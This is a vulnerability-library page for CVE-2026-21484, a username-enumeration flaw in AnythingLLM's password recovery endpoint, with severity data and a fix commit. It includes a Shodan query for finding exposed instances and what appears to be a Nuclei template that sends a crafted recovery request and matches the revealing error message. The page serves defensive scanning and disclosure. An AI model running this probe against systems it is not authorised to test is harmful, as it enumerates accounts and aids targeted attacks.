/Vulnerability Library

AnythingLLM - Username Enumeration via Password Recovery

CVE-2026-21484
Early Release

Description

AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. Prior to commit e287fab56089cf8fcea9ba579a3ecdeca0daa313, the password recovery endpoint returns different error messages depending on whether a username exists, so enabling username enumeration. Commit e287fab56089cf8fcea9ba579a3ecdeca0daa313 fixes this issue.

Severity

Medium

CVSS Score

5.3

Exploit Probability

1%

Affected Product

anything-llm

Published Date

April 15, 2026

Template Author

dhiyaneshdk

CVE-2026-21484.yaml
id: CVE-2026-21484

info:
  name: AnythingLLM - Username Enumeration via Password Recovery
  author: DhiyaneshDk
  severity: medium
  description: |
    AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. Prior to commit e287fab56089cf8fcea9ba579a3ecdeca0daa313, the password recovery endpoint returns different error messages depending on whether a username exists, so enabling username enumeration. Commit e287fab56089cf8fcea9ba579a3ecdeca0daa313 fixes this issue.
  impact: |
    Attackers can enumerate valid usernames, aiding further targeted attacks or social engineering.
  remediation: Update to the version including commit e287fab56089cf8fcea9ba579a3ecdeca0daa313 or later.
  reference:
    - https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-47vr-w3vm-69ch
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-21484
    epss-score: 0.01216
    epss-percentile: 0.79046
    cwe-id: CWE-203,CWE-204
  metadata:
    verified: true
    max-request: 2
    vendor: mintplex-labs
    product: anything-llm
    shodan-query: http.favicon.hash:-1279687529
  tags: cve,cve2026,anythingllm,user-enum

variables:
  rc1: "{{rand_text_alphanumeric(8)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(12)}}"
  rc2: "{{rand_text_alphanumeric(8)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(12)}}"
  rc3: "{{rand_text_alphanumeric(8)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(12)}}"
  rc4: "{{rand_text_alphanumeric(8)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(12)}}"

http:
  - raw:
      - |
        POST /api/system/recover-account HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":"{{randstr}}","recoveryCodes":["{{rc3}}","{{rc4}}"]}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 400'
          - 'contains_all(body, "Invalid recovery codes","success")'
        condition: and
# digest: 4a0a00473045022016a21918300eb3d1275e2e6365b4f14258ed7d2acd4ebd0b742ffd4d159e3be9022100941f3806bb49ec325d83f0be539a6c1f4e93d469c8f1ab64c76f8ea282042f93:922c64590222798bb761d5b6d8e72950
5.3Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVE ID:
cve-2026-21484
CWE ID:
cwe-203, cwe-204

References

https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-47vr-w3vm-69ch

Remediation Steps

Update to the version including commit e287fab56089cf8fcea9ba579a3ecdeca0daa313 or later.